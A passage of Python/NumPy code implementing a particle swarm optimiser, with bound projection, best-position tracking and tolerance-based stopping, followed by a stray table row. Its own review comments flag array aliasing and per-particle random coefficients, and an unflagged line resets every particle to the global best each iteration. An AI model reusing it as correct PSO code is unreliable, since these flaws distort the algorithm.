    ps_X_best = np.zeros((N_ps, X_lower.size)); # local best positions of all particles
    ps_Y_best = np.zeros((N_ps, 1));
    X_best = np.zeros((1, X_lower.size)); # global best position of all particles
    progress_x_ps[0] = X0;
    progress_y_ps[0] = func_ps(X0);
    # NOTE(review): these assignments bind views into progress_x_ps[0] /
    # progress_y_ps[0], so the in-place local-best updates inside the loop
    # also overwrite the recorded iteration-0 history — confirm intended.
    ps_X_best = progress_x_ps[0];
    ps_Y_best = progress_y_ps[0];
    indx_min = np.argmin(ps_Y_best, axis = 0);
    X_best = ps_X_best[indx_min];
    progress_x[0] = ps_X_best[indx_min];
    progress_y[0] = ps_Y_best[indx_min];
    X_old = ps_X_best;
    for iter_no in range(1, N_iter_max + 1):
        # Velocity update: inertia + cognitive pull toward each particle's
        # best + social pull toward the global best.
        # NOTE(review): one random coefficient per particle (shape (N_ps, 1))
        # is shared across all dimensions; canonical PSO draws one per
        # dimension — confirm this is intended.
        d = w * d + c1 * np.random.rand(N_ps, 1) * (ps_X_best - X_old) + c2 * np.random.rand(N_ps, 1) * (X_best - X_old);
        # Projection onto constrained parameter space
        d[d < d_lower] = d_lower;
        d[d > d_upper] = d_upper;
        alpha *= 0.99; # to speed up convergence
        X = X_old + alpha * d;
        # Projection onto constrained parameter space
        indx_limits = (X < ps_X_lower);
        X[indx_limits] = ps_X_lower[indx_limits];
        indx_limits = (X > ps_X_upper);
        X[indx_limits] = ps_X_upper[indx_limits];
        progress_x_ps[iter_no] = X;
        progress_y_ps[iter_no] = func_ps(X);
        # Particles whose new objective value improved on their local best.
        indx_update = (progress_y_ps[iter_no] < ps_Y_best).ravel();
        ps_X_best[indx_update] = progress_x_ps[iter_no][indx_update]; # updating local best positions
        ps_Y_best[indx_update] = progress_y_ps[iter_no][indx_update];
        indx_min = np.argmin(ps_Y_best, axis = 0);
        X_best = ps_X_best[indx_min]; # updating global best position
        progress_x[iter_no] = ps_X_best[indx_min];
        progress_y[iter_no] = ps_Y_best[indx_min];
        # Relative-change stopping criteria on the global best position (X)
        # and on the global best objective value (Y).
        if (np.linalg.norm(progress_x[iter_no].reshape(X_lower.size, 1) - progress_x[iter_no - 1].reshape(X_lower.size, 1), axis = 0) \
            < tolerance_x * np.linalg.norm(progress_x[iter_no].reshape(X_lower.size, 1), axis = 0)):
            print('Tolerance in X is reached in %d iterations, exit..' % (iter_no));
            break;
        if (np.abs(progress_y[iter_no] - progress_y[iter_no - 1]) < tolerance_y * np.abs(progress_y[iter_no - 1])):
            print('Tolerance in Y is reached in %d iterations, exit..' % (iter_no));
            break;
        X_old = X_best;
    # Transpose results back to column-vector convention for the caller.
    X_best = X_best.T;
    progress_x = progress_x.T;
    progress_y = progress_y.T;
    report = {'N_iter_max' : N_iter_max, 'iter_no' : iter_no, 'X0' : X0, 'X_best' : X_best, 'progress_x_ps' : progress_x_ps,
              'progress_y_ps' : progress_y_ps, 'progress_x' : progress_x, 'progress_y' : progress_y};
    return (X_best, report);
| 3,905 | 0 | 23 |